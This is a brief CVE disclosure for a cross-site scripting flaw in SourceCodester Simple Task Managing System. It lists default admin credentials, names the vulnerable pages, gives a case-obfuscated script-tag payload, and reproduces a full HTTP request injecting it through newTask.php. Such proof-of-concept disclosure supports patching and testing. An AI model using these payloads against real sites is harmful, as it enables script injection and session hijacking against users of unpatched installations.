CVE-2022-40027 Simple Task Managing System - XSS
A vulnerability classified as problematic was found in SourceCodester Simple Task Managing System. This vulnerability affects unknown code. The manipulation of the argument newTask.php leads to cross site scripting. The attack can be initiated remotely.
username:admin password:admin ----> {ip}/newTask.php
/board.php has XSS
Payload: "><ScRiPt>alert(1)</sCrIpT>
XSS because $shortName can be closed
Payload
GET http://localhost/cve/Task%20Managing%20System%20in%20PHP/newTask.php?sn=%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E HTTP/1.1
Host: localhost
Cache-Control: max-age=0
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=34a9idaoj7m7miduqt31hupisn
Connection: close

